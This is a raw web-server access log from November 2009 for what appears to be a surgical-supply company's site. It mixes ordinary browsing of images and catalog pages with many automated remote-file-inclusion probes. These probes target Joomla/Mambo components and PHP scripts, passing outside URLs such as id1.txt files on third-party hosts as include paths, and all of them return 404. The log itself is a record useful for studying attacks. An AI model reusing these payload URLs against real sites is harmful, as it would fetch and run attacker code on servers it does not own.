72.11.145.8 - - [26/Nov/2009:05:15:41 -0500] "GET /logs/access_log.Q109082900%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:15:45 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:16:14 -0500] "GET /logs/error_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.36.7.125 - - [26/Nov/2009:05:16:18 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:16:18 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:16:33 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:16:33 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
72.11.145.8 - - [26/Nov/2009:05:16:56 -0500] "GET /logs/error_log.Q109110100%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:17:15 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:17:18 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:17:18 -0500] "GET /logs/access_log.Q109091100//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.36.7.125 - - [26/Nov/2009:05:17:21 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76938 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
209.59.12.99 - - [26/Nov/2009:05:17:24 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.36.7.125 - - [26/Nov/2009:05:17:24 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:25 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:25 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:26 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:26 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:27 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:27 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:27 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:27 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:28 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:28 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:29 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:29 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:30 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:30 -0500] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
72.11.145.8 - - [26/Nov/2009:05:17:31 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:17:31 -0500] "GET /logs/access_log.Q109091100%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.36.7.125 - - [26/Nov/2009:05:17:31 -0500] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:31 -0500] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:31 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:32 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:32 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
72.11.145.8 - - [26/Nov/2009:05:17:33 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.36.7.125 - - [26/Nov/2009:05:17:33 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:33 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:34 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:34 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:35 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:35 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:36 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:39 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:40 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:40 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:45 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:45 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
72.11.145.8 - - [26/Nov/2009:05:17:47 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:17:47 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:17:48 -0500] "GET /logs/access_log.Q109091100//admin/business_inc/saveserver.php?thisdir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.36.7.125 - - [26/Nov/2009:05:17:50 -0500] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:50 -0500] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:51 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:52 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:53 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:53 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:59 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
110.36.7.125 - - [26/Nov/2009:05:17:59 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; FunWebProducts)"
117.74.98.18 - - [26/Nov/2009:05:18:07 -0500] "GET //login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:18:07 -0500] "GET /logs//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:18:07 -0500] "GET /logs/access_log.Q109091100//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.120.226.112 - - [26/Nov/2009:05:18:08 -0500] "GET //login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
58.120.226.112 - - [26/Nov/2009:05:18:08 -0500] "GET /logs//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.142.75.77 - - [26/Nov/2009:05:18:08 -0500] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.120.226.112 - - [26/Nov/2009:05:18:09 -0500] "GET /logs/access_log.Q109091100//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:09 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:09 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:11 -0500] "GET /logs/access_log.Q109110600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
117.74.98.18 - - [26/Nov/2009:05:18:15 -0500] "GET /logs/error_log.Q109110500//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:18 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:18 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:05:18:18 -0500] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 352 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:05:18:18 -0500] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 357 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:05:18:18 -0500] "GET /logs/access_log.Q109093000//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 379 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:18 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.120.226.112 - - [26/Nov/2009:05:18:21 -0500] "GET /logs/error_log.Q109110500//login.php?dir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:18:24 -0500] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:18:30 -0500] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:32 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:32 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:32 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:18:33 -0500] "GET /logs/access_log.Q109110600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:18:33 -0500] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [26/Nov/2009:05:18:33 -0500] "GET /logs/access_log.Q109091100//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:18:56 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:18:56 -0500] "GET /logs/access_log.Q109053000%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:18:56 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:19:09 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:19:11 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:19:12 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:19:12 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:19:12 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:19:13 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:05:19:17 -0500] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 352 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:05:19:18 -0500] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 357 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:19:23 -0500] "GET /logs/access_log.Q109081500%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:19:26 -0500] "GET //atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:19:26 -0500] "GET /logs//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:19:26 -0500] "GET /logs/access_log.Q109092500//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:19:26 -0500] "GET /logs/error_log.Q109071000//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:05:19:37 -0500] "GET /logs/access_log.Q109093000//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 379 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:05:19:55 -0500] "GET /logs/access_log.Q109081500%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:19:56 -0500] "GET //include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:19:56 -0500] "GET /logs//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:19:56 -0500] "GET /logs/access_log.Q109093000//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:19:57 -0500] "GET /logs//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:19:57 -0500] "GET //include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
118.220.173.228 - - [26/Nov/2009:05:19:57 -0500] "GET /logs/access_log.Q109093000//include/write.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:20:22 -0500] "GET /logs/access_log.Q109091100//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.233.89.196 - - [26/Nov/2009:05:20:22 -0500] "GET /logs/access_log.Q109082900//atom.php5?page=http://ew.fileave.com/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
